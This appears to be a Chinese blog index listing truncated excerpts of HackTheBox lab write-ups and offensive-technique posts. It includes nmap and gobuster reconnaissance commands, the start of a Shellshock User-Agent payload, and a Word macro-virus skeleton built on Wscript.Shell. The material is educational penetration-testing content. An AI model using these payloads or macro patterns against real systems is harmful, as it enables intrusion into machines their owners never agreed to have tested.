zhyann
Shocker cgi-bin目录shellshock
前提有cgi-bin 403错误Bash要小于4.3 漏洞找到.sh的文件gobuster dir -u http://10.10.10.185/cgi-bin/ -w /usr/share/dirb/wordlists/common.txt -x .sh找到是user.shUser-Agent: () { :;};...
Magic Magic Bytes Head文件上传绕过 mysqldump
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...
客户端攻击1 word宏攻击
1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...
Shadow Copies
shadow copy 也被称作 Volume Shadow Service (VSS)是一种 Microsoft 备份技术,允许创建文件或整个卷的快照。为了管理卷影副本,Microsoft 签名的二进制文件 vshadow.exe作为Windows SDK 的...
Active Directory 中的横向移动5 DCOM
我们将检查一种相当新的横向移动技术,该技术利用分布式组件对象模型 (DCOM)Microsoft 组件对象模型 (COM)是一个用于创建相互交互的软件组件的系统。虽然 COM 是为同进程或跨进程交互而创建的,...
Paper 数据包头扫描 sudo version 1.8.29
简介PaperDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.11.143 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.11.14322 80 443开启 直接gobuster是没有用的...
Meta 子域名爆破 ImageMagick漏洞 环境添加
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.8受害者 IP 10.10.11.140 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14022 80端口开放 gobuster爆破gobuster di...
Pandora UDP扫描 流量转发 环境变量劫持bash受限绕过
简介PandoraDifficulty Easy 实验环境攻击者 Kali 10.10.16.8受害者 IP 10.10.11.136 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.922端口和80端口开放 扫描目录gobuster di...
Bastard MS10-059
简介BackdoorDifficulty Medium 实验环境攻击者 Kali 10.10.16.7受害者 IP 10.10.10.9 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.980/tcp open http Microsoft IIS httpd 7...
Backdoor 利用目录遍历寻找进程
简介BackdoorDifficulty Easy 实验环境攻击者 Kali 10.10.16.7受害者 IP 10.10.11.125 Linux 1. 信息收集收集受害者服务详情22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linu...